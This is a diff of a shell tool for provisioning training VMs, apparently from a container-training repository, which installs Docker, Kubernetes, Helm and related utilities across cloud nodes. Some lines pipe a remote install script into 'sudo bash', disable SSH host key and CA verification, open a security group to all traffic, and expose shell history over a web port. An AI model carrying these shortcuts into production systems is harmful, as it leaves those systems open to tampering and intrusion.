||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -7,15 +7,6 @@ fi
|
||||
if id docker; then
|
||||
sudo userdel -r docker
|
||||
fi
|
||||
pip install --user awscli jinja2 pdfkit
|
||||
sudo apt-get install -y wkhtmltopdf xvfb
|
||||
tmux new-session \; send-keys "
|
||||
[ -f ~/.ssh/id_rsa ] || ssh-keygen
|
||||
|
||||
eval \$(ssh-agent)
|
||||
ssh-add
|
||||
Xvfb :0 &
|
||||
export DISPLAY=:0
|
||||
mkdir -p ~/www
|
||||
sudo docker run -d -p 80:80 -v \$HOME/www:/usr/share/nginx/html nginx
|
||||
"
|
||||
sudo apt-get update -q
|
||||
sudo apt-get install -qy jq python-pip wkhtmltopdf xvfb
|
||||
pip install --user awscli jinja2 pdfkit pssh
|
||||
|
||||
10
prepare-vms/e2e.sh
Executable file
10
prepare-vms/e2e.sh
Executable file
@@ -0,0 +1,10 @@
|
||||
#!/bin/sh
|
||||
set -e
|
||||
TAG=$(./workshopctl maketag)
|
||||
./workshopctl start --settings settings/jerome.yaml --infra infra/aws-eu-central-1 --tag $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kube $TAG
|
||||
./workshopctl helmprom $TAG
|
||||
while ! ./workshopctl kubetest $TAG; do sleep 1; done
|
||||
./workshopctl tmux $TAG
|
||||
echo ./workshopctl stop $TAG
|
||||
6
prepare-vms/infra/example.aws
Normal file
6
prepare-vms/infra/example.aws
Normal file
@@ -0,0 +1,6 @@
|
||||
INFRACLASS=aws
|
||||
# If you are using AWS to deploy, copy this file (e.g. to "aws", or "us-east-1")
|
||||
# and customize the variables below.
|
||||
export AWS_DEFAULT_REGION=us-east-1
|
||||
export AWS_ACCESS_KEY_ID=AKI...
|
||||
export AWS_SECRET_ACCESS_KEY=...
|
||||
2
prepare-vms/infra/example.generic
Normal file
2
prepare-vms/infra/example.generic
Normal file
@@ -0,0 +1,2 @@
|
||||
INFRACLASS=generic
|
||||
# This is for manual provisioning. No other variable or configuration is needed.
|
||||
9
prepare-vms/infra/example.openstack
Normal file
9
prepare-vms/infra/example.openstack
Normal file
@@ -0,0 +1,9 @@
|
||||
INFRACLASS=openstack
|
||||
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
|
||||
# and customize the variables below.
|
||||
export TF_VAR_user="jpetazzo"
|
||||
export TF_VAR_tenant="training"
|
||||
export TF_VAR_domain="Default"
|
||||
export TF_VAR_password="..."
|
||||
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
|
||||
export TF_VAR_flavor="GP1.S"
|
||||
@@ -1,105 +0,0 @@
|
||||
aws_display_tags() {
|
||||
# Print all "Name" tags in our region with their instance count
|
||||
echo "[#] [Status] [Token] [Tag]" \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
aws ec2 describe-instances \
|
||||
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
|
||||
| tr -d "\r" \
|
||||
| uniq -c \
|
||||
| sort -k 3 \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
}
|
||||
|
||||
aws_get_tokens() {
|
||||
aws ec2 describe-instances --output text \
|
||||
--query 'Reservations[*].Instances[*].[ClientToken]' \
|
||||
| sort -u
|
||||
}
|
||||
|
||||
aws_display_instance_statuses_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
|
||||
IDS=$(aws ec2 describe-instances \
|
||||
--filters "Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
|
||||
|
||||
aws ec2 describe-instance-status \
|
||||
--instance-ids $IDS \
|
||||
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
|
||||
--output table
|
||||
}
|
||||
|
||||
aws_display_instances_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
result=$(aws ec2 describe-instances --output table \
|
||||
--filter "Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].[ \
|
||||
InstanceId, \
|
||||
State.Name, \
|
||||
Tags[0].Value, \
|
||||
PublicIpAddress, \
|
||||
InstanceType \
|
||||
]"
|
||||
)
|
||||
if [[ -z $result ]]; then
|
||||
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
|
||||
else
|
||||
echo "$result"
|
||||
fi
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_filter() {
|
||||
FILTER=$1
|
||||
aws ec2 describe-instances --filters $FILTER \
|
||||
--query Reservations[*].Instances[*].InstanceId \
|
||||
--output text | tr "\t" "\n" | tr -d "\r"
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_client_token() {
|
||||
TOKEN=$1
|
||||
need_tag $TOKEN
|
||||
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
|
||||
}
|
||||
|
||||
aws_get_instance_ips_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
|
||||
--output text \
|
||||
--query "Reservations[*].Instances[*].PublicIpAddress" \
|
||||
| tr "\t" "\n" \
|
||||
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
|
||||
}
|
||||
|
||||
aws_kill_instances_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
IDS=$(aws_get_instance_ids_by_tag $TAG)
|
||||
if [ -z "$IDS" ]; then
|
||||
die "Invalid tag."
|
||||
fi
|
||||
|
||||
info "Deleting instances with tag $TAG."
|
||||
|
||||
aws ec2 terminate-instances --instance-ids $IDS \
|
||||
| grep ^TERMINATINGINSTANCES
|
||||
|
||||
info "Deleted instances with tag $TAG."
|
||||
}
|
||||
|
||||
aws_tag_instances() {
|
||||
OLD_TAG_OR_TOKEN=$1
|
||||
NEW_TAG=$2
|
||||
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
|
||||
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
|
||||
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
|
||||
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
|
||||
}
|
||||
@@ -50,27 +50,41 @@ sep() {
|
||||
fi
|
||||
}
|
||||
|
||||
need_tag() {
|
||||
need_infra() {
|
||||
if [ -z "$1" ]; then
|
||||
die "Please specify infrastructure file. (e.g.: infra/aws)"
|
||||
fi
|
||||
if [ "$1" = "--infra" ]; then
|
||||
die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
|
||||
fi
|
||||
if [ ! -f "$1" ]; then
|
||||
die "Infrastructure file $1 doesn't exist."
|
||||
fi
|
||||
. "$1"
|
||||
. "lib/infra/$INFRACLASS.sh"
|
||||
}
|
||||
|
||||
need_tag() {
|
||||
if [ -z "$TAG" ]; then
|
||||
die "Please specify a tag or token. To see available tags and tokens, run: $0 list"
|
||||
fi
|
||||
if [ ! -d "tags/$TAG" ]; then
|
||||
die "Tag $TAG not found (directory tags/$TAG does not exist)."
|
||||
fi
|
||||
for FILE in settings.yaml ips.txt infra.sh; do
|
||||
if [ ! -f "tags/$TAG/$FILE" ]; then
|
||||
warning "File tags/$TAG/$FILE not found."
|
||||
fi
|
||||
done
|
||||
. "tags/$TAG/infra.sh"
|
||||
. "lib/infra/$INFRACLASS.sh"
|
||||
}
|
||||
|
||||
need_settings() {
|
||||
if [ -z "$1" ]; then
|
||||
die "Please specify a settings file."
|
||||
elif [ ! -f "$1" ]; then
|
||||
die "Please specify a settings file. (e.g.: settings/kube101.yaml)"
|
||||
fi
|
||||
if [ ! -f "$1" ]; then
|
||||
die "Settings file $1 doesn't exist."
|
||||
fi
|
||||
}
|
||||
|
||||
need_ips_file() {
|
||||
IPS_FILE=$1
|
||||
if [ -z "$IPS_FILE" ]; then
|
||||
die "IPS_FILE not set."
|
||||
fi
|
||||
|
||||
if [ ! -s "$IPS_FILE" ]; then
|
||||
die "IPS_FILE $IPS_FILE not found. Please run: $0 ips <TAG>"
|
||||
fi
|
||||
}
|
||||
|
||||
@@ -2,26 +2,16 @@ export AWS_DEFAULT_OUTPUT=text
|
||||
|
||||
HELP=""
|
||||
_cmd() {
|
||||
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
|
||||
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
|
||||
}
|
||||
|
||||
_cmd help "Show available commands"
|
||||
_cmd_help() {
|
||||
printf "$(basename $0) - the orchestration workshop swiss army knife\n"
|
||||
printf "$(basename $0) - the container training swiss army knife\n"
|
||||
printf "Commands:"
|
||||
printf "%s" "$HELP" | sort
|
||||
}
|
||||
|
||||
_cmd amis "List Ubuntu AMIs in the current region"
|
||||
_cmd_amis() {
|
||||
find_ubuntu_ami -r $AWS_DEFAULT_REGION "$@"
|
||||
}
|
||||
|
||||
_cmd ami "Show the AMI that will be used for deployment"
|
||||
_cmd_ami() {
|
||||
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 16.04 -t hvm:ebs -N -q
|
||||
}
|
||||
|
||||
_cmd build "Build the Docker image to run this program in a container"
|
||||
_cmd_build() {
|
||||
docker-compose build
|
||||
@@ -32,73 +22,67 @@ _cmd_wrap() {
|
||||
docker-compose run --rm workshopctl "$@"
|
||||
}
|
||||
|
||||
_cmd cards "Generate ready-to-print cards for a batch of VMs"
|
||||
_cmd cards "Generate ready-to-print cards for a group of VMs"
|
||||
_cmd_cards() {
|
||||
TAG=$1
|
||||
SETTINGS=$2
|
||||
need_tag $TAG
|
||||
need_settings $SETTINGS
|
||||
need_tag
|
||||
|
||||
# If you're not using AWS, populate the ips.txt file manually
|
||||
if [ ! -f tags/$TAG/ips.txt ]; then
|
||||
aws_get_instance_ips_by_tag $TAG >tags/$TAG/ips.txt
|
||||
fi
|
||||
# This will process ips.txt to generate two files: ips.pdf and ips.html
|
||||
(
|
||||
cd tags/$TAG
|
||||
../../lib/ips-txt-to-html.py settings.yaml
|
||||
)
|
||||
|
||||
# Remove symlinks to old cards
|
||||
rm -f ips.html ips.pdf
|
||||
|
||||
# This will generate two files in the base dir: ips.pdf and ips.html
|
||||
lib/ips-txt-to-html.py $SETTINGS
|
||||
|
||||
for f in ips.html ips.pdf; do
|
||||
# Remove old versions of cards if they exist
|
||||
rm -f tags/$TAG/$f
|
||||
|
||||
# Move the generated file and replace it with a symlink
|
||||
mv -f $f tags/$TAG/$f && ln -s tags/$TAG/$f $f
|
||||
done
|
||||
ln -sf ../tags/$TAG/ips.html www/$TAG.html
|
||||
ln -sf ../tags/$TAG/ips.pdf www/$TAG.pdf
|
||||
|
||||
info "Cards created. You can view them with:"
|
||||
info "xdg-open ips.html ips.pdf (on Linux)"
|
||||
info "open ips.html ips.pdf (on MacOS)"
|
||||
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
|
||||
info "open tags/$TAG/ips.html (on macOS)"
|
||||
info "Or you can start a web server with:"
|
||||
info "$0 www"
|
||||
}
|
||||
|
||||
_cmd deploy "Install Docker on a bunch of running VMs"
|
||||
_cmd_deploy() {
|
||||
TAG=$1
|
||||
SETTINGS=$2
|
||||
need_tag $TAG
|
||||
need_settings $SETTINGS
|
||||
link_tag $TAG
|
||||
count=$(wc -l ips.txt)
|
||||
need_tag
|
||||
|
||||
# wait until all hosts are reachable before trying to deploy
|
||||
info "Trying to reach $TAG instances..."
|
||||
while ! tag_is_reachable $TAG; do
|
||||
while ! tag_is_reachable; do
|
||||
>/dev/stderr echo -n "."
|
||||
sleep 2
|
||||
done
|
||||
>/dev/stderr echo ""
|
||||
|
||||
echo deploying > tags/$TAG/status
|
||||
sep "Deploying tag $TAG"
|
||||
pssh -I tee /tmp/settings.yaml <$SETTINGS
|
||||
|
||||
# Wait for cloudinit to be done
|
||||
pssh "
|
||||
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
|
||||
sleep 1
|
||||
done"
|
||||
|
||||
# Copy settings and install Python YAML parser
|
||||
pssh -I tee /tmp/settings.yaml <tags/$TAG/settings.yaml
|
||||
pssh "
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install -y python-setuptools &&
|
||||
sudo easy_install pyyaml"
|
||||
sudo apt-get install -y python-yaml"
|
||||
|
||||
# Copy postprep.py to the remote machines, and execute it, feeding it the list of IP addresses
|
||||
pssh -I tee /tmp/postprep.py <lib/postprep.py
|
||||
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <ips.txt
|
||||
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <tags/$TAG/ips.txt
|
||||
|
||||
# Install docker-prompt script
|
||||
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
|
||||
pssh sudo chmod +x /usr/local/bin/docker-prompt
|
||||
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
|
||||
pssh "
|
||||
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
|
||||
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
sudo -u docker tar -C /home/docker -xf-"
|
||||
|
||||
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
|
||||
@@ -107,24 +91,78 @@ _cmd_deploy() {
|
||||
cat /home/docker/.ssh/id_rsa.pub |
|
||||
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
|
||||
|
||||
# On node1, create and deploy TLS certs using Docker Machine
|
||||
# On the first node, create and deploy TLS certs using Docker Machine
|
||||
# (Currently disabled.)
|
||||
true || pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
grep ' node' /etc/hosts |
|
||||
if i_am_first_node; then
|
||||
grep '[0-9]\$' /etc/hosts |
|
||||
xargs -n2 sudo -H -u docker \
|
||||
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
|
||||
fi"
|
||||
|
||||
sep "Deployed tag $TAG"
|
||||
echo deployed > tags/$TAG/status
|
||||
info "You may want to run one of the following commands:"
|
||||
info "$0 kube $TAG"
|
||||
info "$0 pull_images $TAG"
|
||||
info "$0 cards $TAG $SETTINGS"
|
||||
info "$0 cards $TAG"
|
||||
}
|
||||
|
||||
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
|
||||
_cmd_disabledocker() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "
|
||||
sudo systemctl disable docker.service
|
||||
sudo systemctl disable docker.socket
|
||||
sudo systemctl stop docker
|
||||
sudo killall containerd
|
||||
"
|
||||
}
|
||||
|
||||
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
|
||||
_cmd_kubebins() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh --timeout 300 "
|
||||
set -e
|
||||
cd /usr/local/bin
|
||||
if ! [ -x etcd ]; then
|
||||
##VERSION##
|
||||
curl -L https://github.com/etcd-io/etcd/releases/download/v3.4.3/etcd-v3.4.3-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
|
||||
fi
|
||||
if ! [ -x hyperkube ]; then
|
||||
##VERSION##
|
||||
curl -L https://dl.k8s.io/v1.17.2/kubernetes-server-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=3 -zx \
|
||||
kubernetes/server/bin/kube{ctl,let,-proxy,-apiserver,-scheduler,-controller-manager}
|
||||
fi
|
||||
sudo mkdir -p /opt/cni/bin
|
||||
cd /opt/cni/bin
|
||||
if ! [ -x bridge ]; then
|
||||
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.6/cni-plugins-amd64-v0.7.6.tgz \
|
||||
| sudo tar -zx
|
||||
fi
|
||||
"
|
||||
}
|
||||
|
||||
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
|
||||
_cmd_kube() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# Optional version, e.g. 1.13.5
|
||||
KUBEVERSION=$2
|
||||
if [ "$KUBEVERSION" ]; then
|
||||
EXTRA_APTGET="=$KUBEVERSION-00"
|
||||
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
|
||||
else
|
||||
EXTRA_APTGET=""
|
||||
EXTRA_KUBEADM=""
|
||||
fi
|
||||
|
||||
# Install packages
|
||||
pssh --timeout 200 "
|
||||
@@ -134,19 +172,19 @@ _cmd_kube() {
|
||||
sudo tee /etc/apt/sources.list.d/kubernetes.list"
|
||||
pssh --timeout 200 "
|
||||
sudo apt-get update -q &&
|
||||
sudo apt-get install -qy kubelet kubeadm kubectl
|
||||
sudo apt-get install -qy kubelet$EXTRA_APTGET kubeadm$EXTRA_APTGET kubectl$EXTRA_APTGET &&
|
||||
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
|
||||
|
||||
# Initialize kube master
|
||||
pssh --timeout 200 "
|
||||
if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
|
||||
kubeadm token generate > /tmp/token
|
||||
sudo kubeadm init --token \$(cat /tmp/token)
|
||||
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
|
||||
kubeadm token generate > /tmp/token &&
|
||||
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
|
||||
fi"
|
||||
|
||||
# Put kubeconfig in ubuntu's and docker's accounts
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
|
||||
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
|
||||
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
|
||||
@@ -156,53 +194,103 @@ _cmd_kube() {
|
||||
|
||||
# Install weave as the pod network
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
kubever=\$(kubectl version | base64 | tr -d '\n')
|
||||
if i_am_first_node; then
|
||||
kubever=\$(kubectl version | base64 | tr -d '\n') &&
|
||||
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
|
||||
fi"
|
||||
|
||||
# Join the other nodes to the cluster
|
||||
pssh --timeout 200 "
|
||||
if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
|
||||
TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token)
|
||||
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
|
||||
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
|
||||
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
|
||||
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
|
||||
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
|
||||
fi"
|
||||
|
||||
# Install metrics server
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
|
||||
fi"
|
||||
|
||||
# Install kubectx and kubens
|
||||
pssh "
|
||||
[ -d kubectx ] || git clone https://github.com/ahmetb/kubectx &&
|
||||
sudo ln -sf /home/ubuntu/kubectx/kubectx /usr/local/bin/kctx &&
|
||||
sudo ln -sf /home/ubuntu/kubectx/kubens /usr/local/bin/kns &&
|
||||
sudo cp /home/ubuntu/kubectx/completion/*.bash /etc/bash_completion.d &&
|
||||
[ -d kube-ps1 ] || git clone https://github.com/jonmosco/kube-ps1 &&
|
||||
sudo -u docker sed -i s/docker-prompt/kube_ps1/ /home/docker/.bashrc &&
|
||||
sudo -u docker tee -a /home/docker/.bashrc <<EOF
|
||||
. /home/ubuntu/kube-ps1/kube-ps1.sh
|
||||
KUBE_PS1_PREFIX=""
|
||||
KUBE_PS1_SUFFIX=""
|
||||
KUBE_PS1_SYMBOL_ENABLE="false"
|
||||
KUBE_PS1_CTX_COLOR="green"
|
||||
KUBE_PS1_NS_COLOR="green"
|
||||
EOF"
|
||||
|
||||
# Install stern
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/stern ]; then
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.8.0/stern_linux_amd64
|
||||
sudo chmod +x /usr/local/bin/stern
|
||||
##VERSION##
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
|
||||
sudo chmod +x /usr/local/bin/stern &&
|
||||
stern --completion bash | sudo tee /etc/bash_completion.d/stern
|
||||
fi"
|
||||
|
||||
# Install helm
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/helm ]; then
|
||||
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | sudo bash
|
||||
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get-helm-3 | sudo bash &&
|
||||
helm completion bash | sudo tee /etc/bash_completion.d/helm
|
||||
fi"
|
||||
|
||||
# Install ship
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/ship ]; then
|
||||
##VERSION##
|
||||
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
}
|
||||
|
||||
_cmd kubetest "Check that all notes are reporting as Ready"
|
||||
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
|
||||
_cmd_kubereset() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "sudo kubeadm reset --force"
|
||||
}
|
||||
|
||||
_cmd kubetest "Check that all nodes are reporting as Ready"
|
||||
_cmd_kubetest() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# There are way too many backslashes in the command below.
|
||||
# Feel free to make that better ♥
|
||||
pssh "
|
||||
set -e
|
||||
[ -f /tmp/node ]
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
which kubectl
|
||||
for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
|
||||
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
|
||||
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
|
||||
done
|
||||
fi"
|
||||
}
|
||||
|
||||
_cmd ids "List the instance IDs belonging to a given tag or token"
|
||||
_cmd ids "(FIXME) List the instance IDs belonging to a given tag or token"
|
||||
_cmd_ids() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
@@ -215,262 +303,398 @@ _cmd_ids() {
|
||||
aws_get_instance_ids_by_client_token $TAG
|
||||
}
|
||||
|
||||
_cmd ips "List the IP addresses of the VMs for a given tag or token"
|
||||
_cmd_ips() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
mkdir -p tags/$TAG
|
||||
aws_get_instance_ips_by_tag $TAG | tee tags/$TAG/ips.txt
|
||||
link_tag $TAG
|
||||
}
|
||||
|
||||
_cmd list "List available batches in the current region"
|
||||
_cmd list "List available groups for a given infrastructure"
|
||||
_cmd_list() {
|
||||
info "Listing batches in region $AWS_DEFAULT_REGION:"
|
||||
aws_display_tags
|
||||
need_infra $1
|
||||
infra_list
|
||||
}
|
||||
|
||||
_cmd status "List instance status for a given batch"
|
||||
_cmd_status() {
|
||||
info "Using region $AWS_DEFAULT_REGION."
|
||||
_cmd listall "List VMs running on all configured infrastructures"
|
||||
_cmd_listall() {
|
||||
for infra in infra/*; do
|
||||
case $infra in
|
||||
infra/example.*)
|
||||
;;
|
||||
*)
|
||||
info "Listing infrastructure $infra:"
|
||||
need_infra $infra
|
||||
infra_list
|
||||
;;
|
||||
esac
|
||||
done
|
||||
}
|
||||
|
||||
_cmd maketag "Generate a quasi-unique tag for a group of instances"
|
||||
_cmd_maketag() {
|
||||
if [ -z $USER ]; then
|
||||
export USER=anonymous
|
||||
fi
|
||||
MS=$(($(date +%N)/1000000))
|
||||
date +%Y-%m-%d-%H-%M-$MS-$USER
|
||||
}
|
||||
|
||||
_cmd ping "Ping VMs in a given tag, to check that they have network access"
|
||||
_cmd_ping() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
describe_tag $TAG
|
||||
tag_is_reachable $TAG
|
||||
info "You may be interested in running one of the following commands:"
|
||||
info "$0 ips $TAG"
|
||||
info "$0 deploy $TAG <settings/somefile.yaml>"
|
||||
need_tag
|
||||
|
||||
fping < tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
_cmd netfix "Disable GRO and run a pinger job on the VMs"
|
||||
_cmd_netfix () {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "
|
||||
sudo ethtool -K ens3 gro off
|
||||
sudo tee /root/pinger.service <<EOF
|
||||
[Unit]
|
||||
Description=pinger
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/
|
||||
ExecStart=/bin/ping -w60 1.1
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF
|
||||
sudo systemctl enable /root/pinger.service
|
||||
sudo systemctl start pinger"
|
||||
}
|
||||
|
||||
_cmd tailhist "Install history viewer on port 1088"
|
||||
_cmd_tailhist () {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "
|
||||
wget https://github.com/joewalnes/websocketd/releases/download/v0.3.0/websocketd-0.3.0_amd64.deb
|
||||
sudo dpkg -i websocketd-0.3.0_amd64.deb
|
||||
sudo mkdir -p /tmp/tailhist
|
||||
sudo tee /root/tailhist.service <<EOF
|
||||
[Unit]
|
||||
Description=tailhist
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/tmp/tailhist
|
||||
ExecStart=/usr/bin/websocketd --port=1088 --staticdir=. sh -c \"tail -n +1 -f /home/docker/.history || echo 'Could not read history file. Perhaps you need to \\\"chmod +r .history\\\"?'\"
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF
|
||||
sudo systemctl enable /root/tailhist.service
|
||||
sudo systemctl start tailhist"
|
||||
pssh -I sudo tee /tmp/tailhist/index.html <lib/tailhist.html
|
||||
}
|
||||
|
||||
_cmd opensg "Open the default security group to ALL ingress traffic"
|
||||
_cmd_opensg() {
|
||||
aws ec2 authorize-security-group-ingress \
|
||||
--group-name default \
|
||||
--protocol icmp \
|
||||
--port -1 \
|
||||
--cidr 0.0.0.0/0
|
||||
need_infra $1
|
||||
infra_opensg
|
||||
}
|
||||
|
||||
aws ec2 authorize-security-group-ingress \
|
||||
--group-name default \
|
||||
--protocol udp \
|
||||
--port 0-65535 \
|
||||
--cidr 0.0.0.0/0
|
||||
_cmd portworx "Prepare the nodes for Portworx deployment"
|
||||
_cmd_portworx() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
aws ec2 authorize-security-group-ingress \
|
||||
--group-name default \
|
||||
--protocol tcp \
|
||||
--port 0-65535 \
|
||||
--cidr 0.0.0.0/0
|
||||
pssh "
|
||||
sudo truncate --size 10G /portworx.blk &&
|
||||
sudo losetup /dev/loop4 /portworx.blk"
|
||||
}
|
||||
|
||||
_cmd disableaddrchecks "Disable source/destination IP address checks"
|
||||
_cmd_disableaddrchecks() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
infra_disableaddrchecks
|
||||
}
|
||||
|
||||
_cmd pssh "Run an arbitrary command on all nodes"
|
